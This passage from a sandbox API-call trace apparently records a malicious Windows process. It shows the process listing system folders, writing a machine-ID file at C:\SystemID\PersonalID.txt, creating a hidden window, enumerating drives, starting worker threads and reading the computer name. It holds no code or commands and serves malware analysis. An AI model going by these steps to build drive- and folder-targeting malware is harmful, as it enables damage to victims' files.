(HeapHandle=0x620000, Flags=0x0, Size=0x82c) returned 0x2e328e0 [0182.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c94e38, cbMultiByte=-1, lpWideCharStr=0x2e328e0, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0182.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e33118 [0182.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e328e0 | out: hHeap=0x620000) returned 1 [0182.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c8) returned 0x2cb1df0 [0182.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0a238 | out: hHeap=0x620000) returned 1 [0182.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e328e0 [0182.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c94e38, cbMultiByte=-1, lpWideCharStr=0x2e328e0, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0182.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e33950 [0182.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e328e0 | out: hHeap=0x620000) returned 1 [0182.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x826) returned 0x2e328e0 [0182.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c94e38, cbMultiByte=-1, lpWideCharStr=0x2e328e0, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0182.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e34188 [0182.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e328e0 | out: hHeap=0x620000) returned 1 [0182.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x822) returned 0x2e328e0 [0182.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c94e38, cbMultiByte=-1, lpWideCharStr=0x2e328e0, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0182.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e349c0 [0182.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e328e0 | out: hHeap=0x620000) returned 1 [0182.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x834) returned 0x2e351f8 [0182.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c94e38, cbMultiByte=-1, lpWideCharStr=0x2e351f8, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0182.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e35a38 [0182.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e351f8 | out: hHeap=0x620000) returned 1 [0182.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81e) returned 0x2e328e0 [0182.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2e328e0, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0182.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e351f8 [0182.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e328e0 | out: hHeap=0x620000) returned 1 [0182.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x818) returned 0x2d05918 [0182.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0182.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e328e0 [0182.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2a0) returned 0x678140 [0182.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb1df0 | out: hHeap=0x620000) returned 1 [0182.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.248] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0182.252] GetFileType (hFile=0x504) returned 0x1 [0182.252] ReadFile (in: hFile=0x504, lpBuffer=0x2e30860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e820, lpOverlapped=0x0 | out: lpBuffer=0x2e30860*, lpNumberOfBytesRead=0x18e820*=0x2a, lpOverlapped=0x0) returned 1 [0182.253] GetLastError () returned 0x0 [0182.253] ReadFile (in: hFile=0x504, lpBuffer=0x2e30860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e820, lpOverlapped=0x0 | out: lpBuffer=0x2e30860*, lpNumberOfBytesRead=0x18e820*=0x0, lpOverlapped=0x0) returned 1 [0182.254] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 0 [0182.254] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0182.256] GetFileType (hFile=0x504) returned 0x1 [0182.256] GetLastError () returned 0xb7 [0182.262] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.262] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0182.262] RegisterClassExW (param_1=0x18ea30) returned 0xc103 [0182.262] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20100 [0182.282] NtdllDefWindowProc_W () returned 0x0 [0182.282] NtdllDefWindowProc_W () returned 0x1 [0182.285] NtdllDefWindowProc_W () returned 0x0 [0182.289] NtdllDefWindowProc_W () returned 0x0 [0182.290] ShowWindow (hWnd=0x20100, nCmdShow=0) returned 0 [0182.290] UpdateWindow (hWnd=0x20100) returned 1 [0182.290] GetLogicalDrives () returned 0x2000004 [0182.290] SetErrorMode (uMode=0x1) returned 0x0 [0182.290] PathFileExistsA (pszPath="C:\\") returned 1 [0182.290] SetErrorMode (uMode=0x0) returned 0x1 [0182.290] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0182.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x2e30860 [0182.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2e30860, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0182.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e31070 [0182.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e30860 | out: hHeap=0x620000) returned 1 [0182.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x646348 [0182.291] SetErrorMode (uMode=0x1) returned 0x0 [0182.291] PathFileExistsA (pszPath="Z:\\") returned 1 [0182.296] SetErrorMode (uMode=0x0) returned 0x1 [0182.296] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x4 [0182.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x2e30860 [0182.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2e30860, cchWideChar=1027 | out: lpWideCharStr="Z:\\") returned 4 [0182.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e31888 [0182.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e30860 | out: hHeap=0x620000) returned 1 [0182.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9568 [0182.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646348 | out: hHeap=0x620000) returned 1 [0182.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e31070 | out: hHeap=0x620000) returned 1 [0182.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e31888 | out: hHeap=0x620000) returned 1 [0182.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9568 | out: hHeap=0x620000) returned 1 [0182.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x646348 [0182.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c92f70 [0182.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x2e30860 [0182.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e31158 [0182.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e4ae00 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1070) returned 0x2d06138 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb44b8 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2d071b0 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x660) returned 0x2e31970 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e4b688 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e4bf10 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e4c798 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e4d020 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e4d8a8 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2d079c8 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e4e130 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e4e9b8 [0182.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e5ade8 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e5b630 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e5be88 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e4f240 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e4fac8 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e5c6e0 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e5cf28 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e50350 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e50bd8 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e51460 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e51ce8 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e52570 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e52df8 [0182.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e53680 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e53f08 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e54790 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e55018 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e5d770 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e5dfc8 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e558a0 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e56128 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e569b0 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e5e820 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e5f068 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e57238 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e57ac0 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e58348 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e58bd0 [0182.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e59458 [0182.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e59ce0 [0182.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e5f8c8 [0182.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e60150 [0182.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e609d8 [0182.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e6f8b0 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e70108 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e61260 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e61ae8 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e62370 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e70960 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e62bf8 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e63480 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e63d08 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e64590 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e64e18 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e656a0 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e65f28 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e667b0 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e67038 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e678c0 [0182.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e711a8 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e71a00 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e68148 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e689d0 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e69258 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e69ae0 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e6a368 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e6abf0 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e6b478 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e6bd00 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e6c588 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x2ca5d88 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e6ce10 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e72258 [0182.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e72a70 [0182.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e6d698 [0182.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e6df20 [0182.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e6e7a8 [0182.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e732a0 [0182.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e73b28 [0182.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4450 [0182.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e743b0 [0182.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e74c38 [0182.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e754c0 [0182.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e75d48 [0182.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x2e30868, dwCreationFlags=0x0, lpThreadId=0x2c92f78 | out: lpThreadId=0x2c92f78*=0x66c) returned 0x2d0 [0182.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x378) returned 0x2ac [0182.308] GetMessageW (in: lpMsg=0x18ebe0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18ebe0) returned 0 [0198.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2ea6a68 [0198.900] GetComputerNameW (in: lpBuffer=0x2ea6a68, nSize=0x18df5c | out: lpBuffer="Q9IATRKPRH", nSize=0x18df5c) returned 1 [0198.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0198.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.916] IsWindow (hWnd=0x20100) returned 1 [0198.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0204.280] IsWindow (hWnd=0x20100) returned 1 [0204.280] DestroyWindow (hWnd=0x20100) returned 1 [0204.281] NtdllDefWindowProc_W () returned 0x0 [0204.281] PostQuitMessage (nExitCode=0) [0204.282] NtdllDefWindowProc_W () returned 0x0 [0204.289] CloseHandle (hObject=0x500) returned 1 [0204.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646348 | out: hHeap=0x620000) returned 1 [0204.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x659118 | out: hHeap=0x620000) returned 1 [0204.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6597a8 | out: hHeap=0x620000) returned 1 [0204.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94528 | out: hHeap=0x620000) returned 1 [0204.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94640 | out: hHeap=0x620000) returned 1 [0204.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94708 | out: hHeap=0x620000) returned 1 [0204.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c949b0 | out: hHeap=0x620000) returned 1 [0204.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669238 | out: hHeap=0x620000) returned 1 [0204.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9098 | out: hHeap=0x620000) returned 1 [0204.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c949d8 | out: hHeap=0x620000) returned 1 [0204.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94a00 | out: hHeap=0x620000) returned 1 [0204.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94a28 | out: hHeap=0x620000) returned 1 [0204.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94a50 | out: hHeap=0x620000) returned 1 [0204.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94a78 | out: hHeap=0x620000) returned 1 [0204.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94aa0 | out: hHeap=0x620000) returned 1 [0204.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94ac8 | out: hHeap=0x620000) returned 1 [0204.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9178 | out: hHeap=0x620000) returned 1 [0204.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9450 | out: hHeap=0x620000) returned 1 [0204.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94af0 | out: hHeap=0x620000) returned 1 [0204.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94b18 | out: hHeap=0x620000) returned 1 [0204.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94b40 | out: hHeap=0x620000) returned 1 [0204.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94b68 | out: hHeap=0x620000) returned 1 [0204.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94b90 | out: hHeap=0x620000) returned 1 [0204.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94bb8 | out: hHeap=0x620000) returned 1 [0204.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94be0 | out: hHeap=0x620000) returned 1 [0204.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94c08 | out: hHeap=0x620000) returned 1 [0204.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd93e0 | out: hHeap=0x620000) returned 1 [0204.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9488 | out: hHeap=0x620000) returned 1 [0204.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94c30 | out: hHeap=0x620000) returned 1 [0204.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94c58 | out: hHeap=0x620000) returned 1 [0204.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94c80 | out: hHeap=0x620000) returned 1 [0204.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94ca8 | out: hHeap=0x620000) returned 1 